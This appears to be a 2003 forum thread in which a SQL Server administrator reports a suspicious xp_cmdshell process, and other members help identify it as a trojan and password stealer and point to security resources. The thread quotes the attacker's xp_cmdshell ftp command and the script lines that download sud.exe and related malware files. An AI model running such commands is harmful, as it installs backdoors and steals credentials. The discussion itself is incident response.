SQL Server Performance

xp_cmdshell "ftp -s:c:winntaxis.cmd"

Discussion in 'General DBA Questions' started by Jon M, Nov 6, 2003.

  1. Jon M Member

    I saw this to one of my processes (spid 53). And no internal developer/user is running this command. Could this be a virus or hacker?

    Anyone seen this before?

    Jon M
  2. Luis Martin Moderator

  3. Jon M Member

    I think somebody's trying to hack my machine.

    This is the detail of the axis.cmd:
    open 444
    GET sud.ini
    GET TzoLibr.dll
    GET sud.exe

    Any help would be greatly appreciated.

    Jon M
  4. Jon M Member

    I couldn't even delete the process nor delete the user login.


    [B)] Jon M [xx(]
  5. ChrisFretwell New Member

    I found some detail that may be of use when I went hunting the individual details in the axis.cmd that you listed

    Tzolibr.dll is found in a few virus/trojan horses and info gathers.
    Sud.exe is listed as a backdoor thing-y (forgive my lack of technical use, if its not sql related, I probably dont know the language). It is a password stealer so its quite important that you deal with it immediately.

    There is some more detailed info about sud.exe athttp://www3.ca.com/virusinfo/virus.aspx?ID=9739
    This is the closes MS info on ithttp://www.microsoft.com/technet/security/bulletin/ms00-057.asp

    What you have looks like a version of this, probably with some basic file names to make it less detectable. Check the virus sites, and microsoft for information on removing this. Start with a google search on sud.exe and see where it leads you, then subsearch etc, until you find an exact enough listing. And look into a good virus blocking tool and make sure you get updates regularly for it.

    Good luck and keep us posted.
  6. FrankKalis Moderator

    Piggy-backing on Chris I suggest you take a look at http:www.sqlsecurity.com .
    Very good information on how to secure your server.

    Hm... I think somewhere I have the source from Openhack 2002 on my computer. IIRC there was a description by Microsoft on the absolute minimum permission needed to run SQL Server. If wanted, just post and I'll dig.


    Sorry, too dumb to hack in the coorect link this morning[:I]
  7. Jon M Member

    Thanks for all the info guys.

    Jon M

Share This Page